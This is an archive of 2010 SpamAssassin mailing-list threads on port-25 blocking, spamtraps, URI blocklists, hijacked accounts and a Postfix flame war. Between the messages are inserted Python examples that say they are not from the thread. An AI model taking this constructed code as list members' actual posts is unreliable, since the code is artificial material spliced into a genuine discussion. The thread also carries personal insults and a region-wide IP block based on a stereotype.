A few months ago I asked this list if using SA on outgoing smtp was a
good idea (Thread: SA on outgoing SMTP).
This thread quickly moved to "Block direct port 25 for non-mta users!"
I was really afraid of doing so and didn't really want to go this
way.
Now, about 6 months later, I have to say: I was a fool! Today,
after spending some time trying to find a more user-friendly way to
clean up the mess around here, I came to the conclusion that port 25
blocking on the boundary of my network was inevitable.
Today it's done, and I have followed a few other pieces of advice given on 
the list.

I wanted to testify to the benefits of a well designed network for those
who like me are afraid of annoying customers with security (even more so as
blocking port 25 at the limits of the network is not really annoying
for most customers).

Thanks to Ted Mittelstaedt, Matus UHLAR, Martin Gregorie; with your
help dudes, all I have to care about now is my mailservers'
configuration!

--
Alexandre Chapellon alexandre.chapel...@mana.pf
Mana SAS



I hope you realize you still need to deal with the issues of users with
weak/guessable passwords and phishing of account info as well as the
newer bots that recover account info from Outlook/Outlook
Express/Thunderbird.

Blocking outbound 25 from the rest of your network, and disallowing
submission to your MX on 25 from your network, does very little for
keeping your own MX from sending spam which is what SA on outgoing SMTP
would be for. It's great from a policy standpoint and contains the
"simple" bots, but for keeping your outbound from MX clean, not so much.




That absolutely isn't true. Yes I agree that it's possible for a
spammer to write a virus that uses the submission port and
authenticated SMTP to send mail and runs on a user's PC. But if you're
running even a simple log analysis script on your mailserver and you
READ the daily reports from it, then a user that sends many tens to
hundreds of thousands of e-mails will stick out like a sore thumb.

We have NEVER had a spammer do this to one of our users. I don't know
why because it seems to me like it's an obvious way to relay spam. What
we HAVE had happen is spammers guess weak passwords and relay spam
through the webmail interface. My guess is that it's just a lot
easier to do this for them. Of course, when they do that their outgoing
spam is stamped with the username that was used to relay, and it's
very easy to detect and change the password.

So far, all the spam viruses we have encountered on user systems are
of the variety where they infect the client and attempt to relay to
port 25.

Ted


So basically you're agreeing with what I said. It stops the simple bots,
but the other stuff, not so much.



No, you said it "does very little" and I said it only "does very little"
in THEORY, but in actual practice (right now) it does a tremendous 
amount.


In actual practice it does very little for YOUR OWN MX, the simple bots 
simply do not target internal mail servers, they send direct. Which is 
why I said it's good from a policy standpoint but does nothing to 
actually prevent YOUR OWN MX from ending up on an RBL because all the 
bots that can do that don't care that you've got outbound 25 from your 
internal network blocked.




I won't rule out that the spammers won't become smarter but right now
they are stupid.  I guess there's just too many wide-open servers still
out there for them to bother trying to get around one that's been 
tightened down.



I've seen bots use smtp-auth from inside, whether it's by injecting into
O/OE or recovered auth I can't say. I've seen bots use webmail as you
have, I've also seen them use smtp-auth vs submission/ssl (587/495). But
again, that's only after they've either guessed or phished the account
info. In either case you're still left with having to scan outbound from
your own MX, and/or rate limit, or accept being RBL'd for short periods
of time being reactive to log analysis and spam reports.


If you keep on top of the logs then you won't generally be RBLed.  And
you can run a monitoring program like Big Sister and with a bit of
scripting you can be notified when your server starts spamming.
Out-of-the-box the SMTP monitor in Big Sister will alarm if the
mailserver starts slowing down - which is customary when a spammer
commences a large spam run.  But you can also write a script that runs
once an hour and monitors your mailflow and alarms if it jumps.  If you're
graphing your mailflow then spam runs will create spikes that are very
obvious.


At which point it's alread

Re: thanks to thinking people.

2010-07-19 Thread Brian Godette

 On 7/19/2010 1:29 PM, Ted Mittelstaedt wrote:



On 7/19/2010 8:43 AM, Brian Godette wrote:

On 7/15/2010 6:55 PM, Alexandre Chapellon wrote:

Hi all,

A few months ago I asked this list if using SA on outgoing SMTP was a
good idea (Thread: SA on outgoing SMTP).
This thread quickly moved to "Block direct port 25 for non-MTA users!"
I was really afraid of doing so and didn't really want to go this
way.

Now, about 6 months later, I have to say: I was a fool! Today.
After spending some time trying to find a more user-friendly way to
clean up the mess around here, I came to the conclusion that port 25
blocking at the boundary of my network was inevitable.
Today it's done, and I have followed a few other pieces of advice given on
the list.
I wanted to testify to the benefits of a well-designed network for those
who, like me, are afraid of annoying customers with security (even more so
since blocking port 25 at the limits of the network is not really annoying
for most customers).

Thanks to Ted Mittelstaedt, Matus UHLAR, Martin Gregorie; with your
help, dudes, all I have to care about now is my mail server
configuration!


--
Alexandre Chapellon <alexandre.chapel...@mana.pf>
Mana SAS



I hope you realize you still need to deal with the issues of users with
weak/guessable passwords and phishing of account info as well as the
newer bots that recover account info from Outlook/Outlook
Express/Thunderbird.

Blocking outbound 25 from the rest of your network, and disallowing
submission to your MX on 25 from your network, does very little for
keeping your own MX from sending spam which is what SA on outgoing SMTP
would be for. It's great from a policy standpoint and contains the
"simple" bots, but for keeping your outbound from MX clean, not so much.



That absolutely isn't true.  Yes I agree that it's possible for a
spammer to write a virus that uses the submission port and
authenticated SMTP to send mail and runs on a user's PC.  But if you're
running even a simple log analysis script on your mailserver and you
READ the daily reports from it, then a user that sends many tens to
hundreds of thousands of e-mails will stick out like a sore thumb.


We have NEVER had a spammer do this to one of our users.  I don't know
why because it seems to me like it's an obvious way to relay spam.  What
we HAVE had happen is spammers guess weak passwords and relay spam 
through the webmail interface.  My guess is that it's just a lot
easier to do this for them.  Of course, when they do that their outgoing
spam is stamped with the username that was used to relay, and it's
very easy to detect and change the password.


So far, all the spam viruses we have encountered on user systems are
of the variety where they infect the client and attempt to relay to
port 25.

Ted

So basically you're agreeing with what I said. It stops the simple bots, 
but the other stuff, not so much.


I've seen bots use smtp-auth from inside, whether it's by injecting into 
O/OE or recovered auth I can't say. I've seen bots use webmail as you 
have, I've also seen them use smtp-auth vs submission/ssl (587/495). But 
again, that's only after they've either guessed or phished the account 
info. In either case you're still left with having to scan outbound from 
your own MX, and/or rate limit, or accept being RBL'd for short periods 
of time being reactive to log analysis and spam reports.
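The hourly log check Ted describes (count what each authenticated account sends per hour and alarm when one account's volume jumps), written out as an added example; this is not a script from the thread. The Postfix log line format is the real one for authenticated submissions, but the user names, client addresses, message counts and the two thresholds are constructed for the demonstration.

```python
"""Hourly per-account outbound volume check over constructed Postfix logs."""
import re
from collections import defaultdict

# Postfix logs the SASL login on the smtpd "client=" line for authenticated
# submissions, so that line is the one we key on.
_AUTH_RE = re.compile(
    r"^(?P<month>\w{3}) +(?P<day>\d+) (?P<hour>\d{2}):\d{2}:\d{2} \S+ "
    r"postfix/smtpd\[\d+\]: (?P<qid>[0-9A-F]+): client=\S+, "
    r"sasl_method=\S+, sasl_username=(?P<user>\S+)$"
)


def _log_line(day, hh, mm, ss, qid, client, user):
    return (f"Jul {day:2d} {hh:02d}:{mm:02d}:{ss:02d} mx postfix/smtpd[1201]: "
            f"{qid:X}: client={client}, sasl_method=PLAIN, sasl_username={user}")


def build_sample_log():
    """Constructed day of logs: two quiet users plus one account that bursts at 14:00."""
    lines, qid = [], 0x1000
    for hour in range(8, 18):
        for user, per_hour in (("alice", 3), ("bob", 2), ("carol", 4)):
            if user == "carol" and hour == 14:
                per_hour = 600          # the compromised account's spam run
            for i in range(per_hour):
                lines.append(_log_line(19, hour, (i * 37) % 60, (i * 11) % 60,
                                       qid, "unknown[203.0.113.5]", user))
                qid += 1
    # An unrelated smtpd line, to show non-matching lines are ignored.
    lines.append("Jul 19 14:05:00 mx postfix/smtpd[1201]: disconnect from unknown[203.0.113.5]")
    return lines


def count_per_user_hour(lines):
    """Return {user: {"Jul 19 14:00": n, ...}} from authenticated-submission log lines."""
    counts = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = _AUTH_RE.match(line)
        if m:                           # other smtpd lines are skipped
            bucket = f"{m['month']} {int(m['day']):02d} {m['hour']}:00"
            counts[m["user"]][bucket] += 1
    return counts


def flag_senders(counts, hard_limit=200, spike_factor=10, min_spike=20):
    """Flag (user, hour) buckets that look like a spam run.

    hard_limit, spike_factor and min_spike are assumed tuning knobs: any hour
    over hard_limit is flagged outright, and an hour that is spike_factor
    times the account's median hour (and at least min_spike) is flagged as
    a spike. Returns {user: [(bucket, count, reason), ...]}.
    """
    flagged = defaultdict(list)
    for user, buckets in counts.items():
        hourly = sorted(buckets.values())
        median = hourly[len(hourly) // 2]
        for bucket, n in buckets.items():
            if n >= hard_limit:
                flagged[user].append((bucket, n, "above hard limit"))
            elif n >= min_spike and n >= spike_factor * median:
                flagged[user].append((bucket, n, "spike vs. median hour"))
    return dict(flagged)


if __name__ == "__main__":
    for user, hits in flag_senders(count_per_user_hour(build_sample_log())).items():
        for bucket, n, reason in hits:
            print(f"ALARM {user}: {n} messages in hour {bucket} ({reason})")
```

Run it against a real mail.log by replacing `build_sample_log()` with the file's lines; the median-based spike test catches accounts whose normal volume is low long before they reach the hard limit.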


Indirectly related to SA.

2010-07-19 Thread Brian Godette
Like some people I run a small internal spamtrap of addresses never used by
real users, for feeding Bayes as well as reporting to Razor and internal
IXHASH. In addition I also have a database that returns "550 User unknown"
for all email addresses that are "dead", with the date they were
deactivated.


My question is, at what point would one consider such an address old 
enough for inclusion into a reviewed trap for further training and 
reporting, and at what point, if it were left returning "550 User 
unknown", where it could bypass review?
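The two cut-over points the post asks about, modelled as an added example on top of a dead-address database like the one described; this is not the poster's code. The addresses, deactivation dates and, above all, the two age thresholds are assumed values, since the post asks what the right ages are and does not give any.

```python
"""Aging rule for deactivated addresses before they become spamtrap feeds."""
from dataclasses import dataclass
from datetime import date, timedelta


@dataclass(frozen=True)
class Verdict:
    reply: str            # what the MTA answers at RCPT TO
    feed_trap: bool       # copy the message into the trap corpus at all
    needs_review: bool    # a human checks it before Bayes training / reporting


# Constructed database: address -> date it was deactivated.
DEAD_ADDRESSES = {
    "ex-intern@example.org": date(2008, 3, 1),
    "old-sales@example.org": date(2009, 1, 15),
    "retired-alias@example.org": date(2010, 1, 1),
    "jdoe@example.org": date(2010, 6, 30),
}
ACTIVE_ADDRESSES = {"postmaster@example.org", "alice@example.org"}

# Assumed thresholds: after REVIEW_AFTER the address feeds a reviewed trap,
# after AUTO_AFTER it may feed the trap without review.
REVIEW_AFTER = timedelta(days=180)
AUTO_AFTER = timedelta(days=365)

USER_UNKNOWN = "550 User unknown"


def classify_recipient(addr, today, *, dead=DEAD_ADDRESSES, active=ACTIVE_ADDRESSES,
                       review_after=REVIEW_AFTER, auto_after=AUTO_AFTER):
    """Decide the SMTP reply and trap handling for one recipient on a given day."""
    addr = addr.lower()
    if addr in active:
        return Verdict("250 Ok", feed_trap=False, needs_review=False)
    if addr not in dead:
        # Never existed: reject, but do not treat as a trap (typos, probes).
        return Verdict(USER_UNKNOWN, feed_trap=False, needs_review=False)
    age = today - dead[addr]
    if age >= auto_after:
        return Verdict(USER_UNKNOWN, feed_trap=True, needs_review=False)
    if age >= review_after:
        return Verdict(USER_UNKNOWN, feed_trap=True, needs_review=True)
    # Recently deactivated: legitimate stragglers are still likely, reject only.
    return Verdict(USER_UNKNOWN, feed_trap=False, needs_review=False)


def trap_feeds(today, dead=DEAD_ADDRESSES):
    """Split the dead-address database into (reviewed, unreviewed) trap sets for today."""
    reviewed, unreviewed = set(), set()
    for addr in dead:
        v = classify_recipient(addr, today, dead=dead)
        if v.feed_trap:
            (reviewed if v.needs_review else unreviewed).add(addr)
    return reviewed, unreviewed
```

The MTA reply never changes with age (the address is always "User unknown"); only what the trap does with the copy changes, which keeps the aging decision out of the SMTP path.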





Re: thanks to thinking people.

2010-07-19 Thread Brian Godette

 On 7/15/2010 6:55 PM, Alexandre Chapellon wrote:

Hi all,

A few months ago I asked this list if using SA on outgoing SMTP was a
good idea (Thread: SA on outgoing SMTP).

This thread quickly moved to "Block direct port 25 for non-MTA users!"
I was really afraid of doing so and didn't really want to go this way.
Now, about 6 months later, I have to say: I was a fool! Today.
After spending some time trying to find a more user-friendly way to
clean up the mess around here, I came to the conclusion that port 25
blocking at the boundary of my network was inevitable.
Today it's done, and I have followed a few other pieces of advice given on
the list. I wanted to testify to the benefits of a well-designed network
for those who, like me, are afraid of annoying customers with security
(even more so since blocking port 25 at the limits of the network is not
really annoying for most customers).


Thanks to Ted Mittelstaedt, Matus UHLAR, Martin Gregorie; with your
help, dudes, all I have to care about now is my mail server configuration!


--
Alexandre Chapellon

Mana SAS



I hope you realize you still need to deal with the issues of users with 
weak/guessable passwords and phishing of account info as well as the 
newer bots that recover account info from Outlook/Outlook 
Express/Thunderbird.


Blocking outbound 25 from the rest of your network, and disallowing 
submission to your MX on 25 from your network, does very little for 
keeping your own MX from sending spam which is what SA on outgoing SMTP 
would be for. It's great from a policy standpoint and contains the 
"simple" bots, but for keeping your outbound from MX clean, not so much.


Re: URIBL Notice

2010-03-12 Thread Brian
On Fri, 2010-03-12 at 07:48 -0800, Ray Dzek wrote:
> I just received the dreaded URIBL “You send us too many DNS queries”
> notice.  This is fine.  We have been growing and I am sure our queries
> have gone up.  But when looking at their data feed service options the
> first thing I noticed was that there is no fee structure.  I don’t
> know about you, but that is always a red flag in my world.  Before I
> even get past the first paragraph it already smells like a
> “shakedown”.
> 
>  
> 
> But…
> 
>  
> 
> My real question is how badly is my SA environment going to be
> impacted by turning URIBL off?  What increase in spam should I expect?
> 
>  
> 
> Ray
> 
> 
You'll see some difference but from experience it lets through more than
it blocks and is a bit of a 'shutting the stable door after the horse
has bolted' kind of list.

There is nothing to stop you setting up a simple BIND server and
creating your own local uri based block list customised to your own
needs and based on the links you most frequently see. I've done it and
I'm sure plenty of others have too.
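What "a simple BIND server and your own local URI-based block list" looks like in practice, as an added example (not Brian's setup): a generator for the zone file, the SpamAssassin `urirhssub` rule that queries it, and an offline stand-in for the DNS lookup. The zone name `uribl.local`, the rule name `LOCAL_URIBL`, the nameserver and the listed domains are all assumed; the label-by-label lookup is a simplification of what SpamAssassin's URIDNSBL plugin does (it trims the host to its registered domain before querying).

```python
"""Local URI RHSBL: BIND zone generation plus the matching SpamAssassin rule."""

# Constructed list of domains seen in local spam; not from the thread.
BAD_DOMAINS = ["spammy-pills.example", "cheapwatches.example", "phish.example.net"]
ZONE = "uribl.local"   # assumed private zone served by your own BIND


def build_zone(domains, zone=ZONE, serial=2010031201, ns="ns1.example.net."):
    """Emit a BIND zone listing each bad domain as <domain>.<zone> A 127.0.0.2."""
    lines = [
        "$TTL 300",
        f"$ORIGIN {zone}.",
        f"@ IN SOA {ns} hostmaster.example.net. ( {serial} 3600 900 604800 300 )",
        f"@ IN NS {ns}",
    ]
    for d in sorted(domains):
        lines.append(f"{d} IN A 127.0.0.2")          # "listed" answer
        lines.append(f'{d} IN TXT "listed in local URI blocklist"')
    return "\n".join(lines) + "\n"


def sa_rules(zone=ZONE, name="LOCAL_URIBL", score=3.0):
    """SpamAssassin URIDNSBL config that queries the zone for every URI domain."""
    return (
        f"urirhssub {name} {zone}. A 127.0.0.2\n"
        f"body {name} eval:check_uridnsbl('{name}')\n"
        f"describe {name} Contains a URL listed in the local URI blocklist\n"
        f"tflags {name} net\n"
        f"score {name} {score:.1f}\n"
    )


def zone_a_records(zone_text):
    """Names that have A records in the zone text (lets the lookup run offline)."""
    names = set()
    for line in zone_text.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[1] == "IN" and parts[2] == "A":
            names.add(parts[0])
    return names


def lookup_host(host, zone_records):
    """Stand-in for the DNS query: try the host and each parent domain, stop at the TLD."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in zone_records:
            return candidate
    return None


if __name__ == "__main__":
    zone = build_zone(BAD_DOMAINS)
    print(zone)
    print(sa_rules())
    print(lookup_host("www.spammy-pills.example", zone_a_records(zone)))
```

Point the `urirhssub` line at whatever zone BIND serves, reload SpamAssassin, and `spamassassin -D uridnsbl` on a sample message shows the queries it issues against the zone.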





Re: Bogus mails from hijacked accounts

2010-03-11 Thread Brian
On Thu, 2010-03-11 at 07:55 -0600, Dennis B. Hopp wrote:
> > 1)  Spammers rotate sender addresses and hijacked account info more 
> > often than most of us change our underwear.  An account *may* get 
> > reused;  chances are it'll be months before it does, and the spammers 
> > will have rotated through hundreds or thousands of others - both 
> > phish-cracked and those set up just to send their junk.  Blacklisting a 
> > sender is reduced to blocking the persistent friend-of-a-friend who 
> > refuses to remove you from the endless stream of chain-forwards, and 
> > legitimate-but-totally-clueless mailing list operators who can't figure 
> > out how to unsubscribe you from their list.  :(
> > 
> > 2)  You noted originally that these appear to be fully legitimate 
> > freemail accounts, legitimately used in the past to correspond with your 
> > customers/clients, that have been compromised and then used to send 
> > spam.  How do you propose to still allow the legitimate account holders 
> > to email your clients if you blacklist the sender?
> > 
> 
> I don't want to blacklist the address, hence the reason why in my
> original e-mail I said "other than blacklisting".  I know blacklisting
> would block these bogus e-mails as well as legit e-mails as soon as the
> clients get access back (they currently don't have access to their
> accounts because their passwords have been changed).  
> 
> 
> > 
> > Martin's suggestion followup should point you in the right direction. 
> > Sets of phrase rules (how similar are these messages?  do you have ten 
> > or fifteen you can compare sentence-by-sentence?) with low scores will 
> > likely help some too.  Meta rules that bump the score up depending on 
> > how many phrases hit, or phrase+mismatched-sender/reply also work 
> > tolerably well on this class of spam... if you can get enough samples to 
> > build a complete enough set of phrase rules.
> 
> I'm going to look at what Martin suggested and compare it to what
> samples I have.
> 
> Thanks,
> 
> --Dennis
> 
Don't miss the major key in the body - that is 'Western Union'. I don't
know how much legitimate business you do with WU (or Moneygram for that
matter) but it may well be worthy of a half decent score.

> 



Re: Bogus mails from hijacked accounts

2010-03-11 Thread Brian
On Thu, 2010-03-11 at 12:26 +, Ned Slider wrote:
> David B Funk wrote:
> > On Wed, 10 Mar 2010, Dennis B. Hopp wrote:
> >>
> >> I have put a sample at:
> >>
> >> http://pastebin.com/9BDXrxmm
> >>
> >> Note I did change the real e-mail address in this message but the
> >> hotmail address used is valid just masked.
> > 
> > Look at that "X-Originating-IP: [41.155.87.236]" header, its a dial-up
> > pool in Lagos Nigeria.
> > 
> > It may seem stereotyped, but it's amazing the percentage of this kind
> > of spam that -does- come out of that part of the world.
> > 
> 
> How about:
> 
> # Catch spam originating from 41.0.0.0/8 (Africa, incl S.Africa)
> describe  LOCAL_ORIG_FROM_41  Originates from 41.0.0.0/8
> header    LOCAL_ORIG_FROM_41  X-Originating-IP =~ /\[41\./
> 
> Unless you're expecting mail originating from Africa, you can go further
> and detect all mail injected from 41/8 with few FPs.
> 
> # Catch spam injected from 41.0.0.0/8 (Africa, incl S.Africa)
> describe  LOCAL_RCVD_FROM_41  Received from 41.0.0.0/8
> header    LOCAL_RCVD_FROM_41  Received =~ /\[41\./
> 
> I've found these safe to score quite highly, but YMMV so score as suits 
> your mail flow.
> 
> 
Good quality advice from Ned (LOL). Just make sure none of your users
will be communicating with South Africa during the world cup..
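Ned's two header rules, generalised from a /8 regex to a CIDR membership test, as an added example that is not from the thread. It extracts bracketed IPv4 literals from X-Originating-IP and every Received: line and tests them against a network, and it shows why the rule anchors on the opening bracket: a bare `41\.` also matches `141.x` and `10.41.x`. The header sets are constructed; 41.155.87.236 is the address quoted in the thread.

```python
"""CIDR-based origin check for X-Originating-IP / Received headers."""
import ipaddress
import re

_BRACKET_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def ips_in_header(value):
    """All bracketed IPv4 addresses in one header value, skipping malformed ones."""
    found = []
    for m in _BRACKET_IP.finditer(value):
        try:
            found.append(ipaddress.IPv4Address(m.group(1)))
        except ipaddress.AddressValueError:
            continue
    return found


def hits_network(headers, header_name, network):
    """True if any bracketed IP in the named header(s) lies inside network.

    headers is a list of (name, value) pairs: a message carries several
    Received: lines and each is examined, as the Received =~ rule does.
    """
    net = ipaddress.IPv4Network(network)
    return any(
        ip in net
        for name, value in headers
        if name.lower() == header_name.lower()
        for ip in ips_in_header(value)
    )


def naive_hits(headers, header_name):
    """The same idea written as /41\\./ without the bracket: overmatches 141.x and 10.41.x."""
    return any(
        re.search(r"41\.", value)
        for name, value in headers
        if name.lower() == header_name.lower()
    )


# Constructed sample messages as (header name, value) lists.
SPAM_HEADERS = [
    ("Received", "from mx.example.net (mx.example.net [198.51.100.7]) by mail.example.org"),
    ("Received", "from [41.155.87.236] by webmail.example.net with HTTP"),
    ("X-Originating-IP", "[41.155.87.236]"),
]
HAM_HEADERS = [
    ("Received", "from relay.example.com (relay.example.com [141.1.2.3]) by mail.example.org"),
    ("X-Originating-IP", "[10.41.0.1]"),
]

if __name__ == "__main__":
    for label, hdrs in (("spam", SPAM_HEADERS), ("ham", HAM_HEADERS)):
        print(label, "orig:", hits_network(hdrs, "X-Originating-IP", "41.0.0.0/8"),
              "rcvd:", hits_network(hdrs, "Received", "41.0.0.0/8"),
              "naive:", naive_hits(hdrs, "Received"))
```

Swapping the `/8` for a tighter prefix, or a list of prefixes, is a one-line change here, whereas the regex form has to be rewritten for anything that is not a whole first octet.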



Re: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian
On Tue, 2010-03-09 at 15:22 -0800, Bob O'Brien wrote:
> Noel Butler wrote:
> > He has a point though, and why is it when people don't agree with 
> > someone the troll label comes out, FFS get over your selves.  People 
> > always only half read, and then go half cocked, its called life, get 
> > used to it.
> 
> 
> 
> In this case the "troll" label is more of an understatement,
> as there are some pretty clear indications that was the second
> (at least) pseudo-identity adopted by a person who had already
> been formally warned and then ejected from SA-USERS for
> inappropriate behavior.
> 
> 
Said the liar from Barracuda - aka 'emailreg.org'. I may be hated in the
Postfix/Spamassassin groups Bob - but you and Barracuda are hated the
world over. I can't top that!

Still, nice to watch you all whine about this and drag the topic on and
on and on..



Re: End of Thread [Was: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt]

2010-03-09 Thread Brian
On Tue, 2010-03-09 at 12:16 +, Ned Slider wrote:
> Brian wrote:
> > On Tue, 2010-03-09 at 12:35 +0100, Kai Schaetzl wrote:
> >> Brian wrote on Tue, 09 Mar 2010 06:51:45 +:
> >>
> >>> Yes, but that does not answer my question {and is once more Postfix
> >>> biased} AFAIK Postfix is totally unable to reject mail at SMTP time that
> >>> Spamassassin decides IS SPAM without the aid of a milter or policy
> >>> daemon of some kind.
> >> You have a very simplistic view on how mail transportation works and maybe 
> >> on how software works. 
> >> First: Postfix is a M Transport A and not a M Rejection A. It's common 
> >> practice in software design to have "plugins" do work that the core 
> >> package doesn't. 
> > 
> > YAWN - it's not about how software is constructed or what it does, but
> > more about what Postfix is incapable of doing and the old stock trollop
> > that is rolled out 'That's not the job of the MTA'. That answer was just
> > about good enough in the 1990's, but it's lame now.
> > 
> 
> It's clear you either haven't read or haven't understood what Kai wrote, 
> which btw was spot on.
> 
> End of Thread.

It's clear that you aren't able to answer the question. Fact, Postfix
lacks features.

End of thread



Re: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian
On Tue, 2010-03-09 at 12:35 +0100, Kai Schaetzl wrote:
> Brian wrote on Tue, 09 Mar 2010 06:51:45 +:
> 
> > Yes, but that does not answer my question {and is once more Postfix
> > biased} AFAIK Postfix is totally unable to reject mail at SMTP time that
> > Spamassassin decides IS SPAM without the aid of a milter or policy
> > daemon of some kind.
> 
> You have a very simplistic view on how mail transportation works and maybe 
> on how software works. 
> First: Postfix is a M Transport A and not a M Rejection A. It's common 
> practice in software design to have "plugins" do work that the core 
> package doesn't. 

YAWN - it's not about how software is constructed or what it does, but
more about what Postfix is incapable of doing and the old stock trollop
that is rolled out 'That's not the job of the MTA'. That answer was just
about good enough in the 1990's, but it's lame now.

In the year 2010 it is not unreasonable to expect the MTA that takes
responsibility for accepting a message to make reasonable checks about
the validity or content of that message. This is very much a 1980's
programming view of telling the user what they can have, rather than
implementing the basic features the user requires.

It's interesting to note that Barracuda Networks had to write their own
MTA* to put in front of Postfix to support all the features it could not
offer.

Exim seems to offer far more than Postfix will ever bleat about
supporting but perhaps the University of Cambridge have a 'simplistic
view on how mail transportation ... and software works' 

This is all very OT and pointless. Anyone who has dealt with Postfix in
terms of years knows all the flaws, such as rejecting message with
Spamassassin at SMTP needs a milter/PD - and that this milter has (on
top of a few minor bugs) now been found to have a serious vulnerability.

*I use the term 'write their own mta' in the loosest sense of the word
as I have been unable to source the origin of the BSMTP that they use.

Please feel free to carry on flogging a dead horse ;-)





Re: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian
On Tue, 2010-03-09 at 14:45 +0100, Ralf Hildebrandt wrote:
> * Brian :
> 
> > So Ralf - author of 'The Postfix Book', can you please now tell me how
> > to get Postfix to reject mail before it accepts it and gives a 250 -
> > When Spamassassin tags it as spam? 
> 
> Well, I'm using amavisd-new for that, since I'm also scanning the
> mails for viruses:
> 
> smtpd pass  -   -   -   -   -   smtpd
>-o receive_override_options=no_address_mappings
>-o smtpd_proxy_filter=[127.0.0.1]:10025
>-o smtpd_proxy_options=speed_adjust
> 
> and in amavisd-new I'm using:
> 
> $final_spam_destiny   = D_REJECT;
> 
And the bit where I said 'not using amavis / policy deamon / milter'
escaped you where? For someone that wrote a book you don't seem to read
well ;-)





Re: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian
On Tue, 2010-03-09 at 13:38 +, Ned Slider wrote:
> Brian wrote:
> > On Tue, 2010-03-09 at 14:04 +0100, Yet Another Ninja wrote:
> >> to stay on the Postfix 'merry-go-round' for an answer, or we
> >>> can just agree Postfix can't easily do this and move on and stop
> >>> flogging this dead horse :-)
> >> good idea -
> >>
> >> Here, its totally off topic.
> >>
> >> Move it to Postfix lists
> >>
> > Better idea, just drop it! Postfix lacks features and it's a fair
> > statement.
> > 
> 
> It's fair to say Postfix "lacks features" only you seem to want because 
> everyone else understands how to reject mail in Postfix.
They do? Again - without using a milter or Policy Daemon remind me how
Postfix can reject mail c/o Spamassassin before it accepts it? Be my
guest. As you've already told me 'everyone else understands how to
reject mail in Postfix' perhaps you Ned would just answer that for me?
It's OK to say 'it can't' and that it lacks this feature.
> 
> > There are enough arse lickers here without going to the Temple of Wietse
> > to visit the disciples without the socks.
> > 
> > Perhaps if people stopped kissing arse and grovelling so much Postfix
> > would have some sensible features - but that ain't gonna happen any time
> > soon.
> > 
> 
> [Rhetorical] - why do you feel the need to bring that sort of offensive 
> tone to a public mailing list?
> 
And you think you have the right to declare other people's threads as
dead? WTF do you think *you* are just because you don't like what is
written?



Re: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian
On Tue, 2010-03-09 at 13:24 +, Robert Brooks wrote:
> Brian wrote:
> > On Tue, 2010-03-09 at 13:00 +, Robert Brooks wrote:
> >> Brian wrote:
> >>> On Tue, 2010-03-09 at 13:17 +0100, Ralf Hildebrandt wrote:
> >>>> * Brian :
> >>>>
> >>>>> In the year 2010 it is not unreasonable to expect the MTA that takes
> >>>>> responsibility for accepting a message to make reasonable checks about
> >>>>> the validity or content of that message. 
> >>>> Postfix can do this either via the milter interface OR the
> >>>> smtpd_proxy_filter
> >>>>
> >>>> It's very easy.
> >>>>
> >>> So Ralf - author of 'The Postfix Book', can you please now tell me how
> >>> to get Postfix to reject mail before it accepts it and gives a 250 -
> >>> When Spamassassin tags it as spam? 
> >> personally I use smtpd_proxy_filter to do EXACTLY this.
> > 
> > And without an external program.. ?
> > 
> > Clue 'YOU CAN'T'.
> 
> so your objection is that there's an "external program" between Postfix 
> and Spamassassin?
> 
> Personally I find amavisd-new does a fine job. That Postfix doesn't 
> directly present an email directly to spamassassin is fine with me, 
> since I wish to do a bunch of other checks (AV for instance).

Do I object to there being a program to interface Postfix to
Spamassassin - not necessarily. It would be nicer to not have to do it
this way and the clue as to why is in the title of the thread.

Postfix remains an MTA for the 1990's as it is, but that's just a view.
If 9x% of the traffic an MTA gets to see is unwanted SPAM, it's not
unreasonable to expect a solid and reliable built in mechanism to reject
it. It's a Postfix ethos to not accept mail for 'x' reason but the old
'it's only an MTA' argument comes out time and time again by a small
group of people who are so far up the arse of WT, you would think they
were his piles!

Put it this way. If I were buying a cheap car 20 years ago I would have
expected to add my own alarm and immobiliser to deal with threats and
vulnerabilities - after all a car is just a car, not a security system.
In 2010 even a cheap car has a built in immobiliser as it has adapted to
the threat and expectations of customers.

I'm glad you like amavis-new. I found it to scale poorly and a single,
common point of failure and fall into the category that is commonly
called 'bloat'. It does illustrate all the missing features of Postfix
in quite a handy example - so thanks for mentioning it.

This thread has run on past its bedtime and has already degenerated
beyond useful to Spamassassin users. I'm sure the asshats and asslickers
will continue to populate it and argue the toss, but the facts are
stark. Postfix lacks basic features for the age. Put it side by side
with Exim and the 'it's only an MTA' thing falls flat on its face.

Good luck squabbling about it girls LOL.





Re: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian
On Tue, 2010-03-09 at 13:17 +0100, Ralf Hildebrandt wrote:
> * Brian :
> 
> > In the year 2010 it is not unreasonable to expect the MTA that takes
> > responsibility for accepting a message to make reasonable checks about
> > the validity or content of that message. 
> 
> Postfix can do this either via the milter interface OR the
> smtpd_proxy_filter
> 
> It's very easy.
> 
GROAN *** WE KNOW THAT!
Look at the title and read the post Ralf. The point is you need to use a
milter or proxy/policy daemon to do this with Postfix. The point being
'Why does it not natively support this functionality in the year 2010?' 

Answer: Because Wietse (AKA 'God') says so, so you all jump and say 'yes
sir, no sir, three bags full sir'.

So Ralf - author of 'The Postfix Book', can you please now tell me how
to get Postfix to reject mail before it accepts it and gives a 250 -
When Spamassassin tags it as spam? 

It's 2010, spam accounts for 9x% of mail so please share with me how you
can do this with just a minor config change with Postfix. The caveat you
can't use the milter, you can't use 'amavis-crashalot' and a 250 must
not be given if Spamassassin marks it as spam. I can't find it in your
book anywhere old chap..

I'm happy to stay on the Postfix 'merry-go-round' for an answer, or we
can just agree Postfix can't easily do this and move on and stop
flogging this dead horse :-)





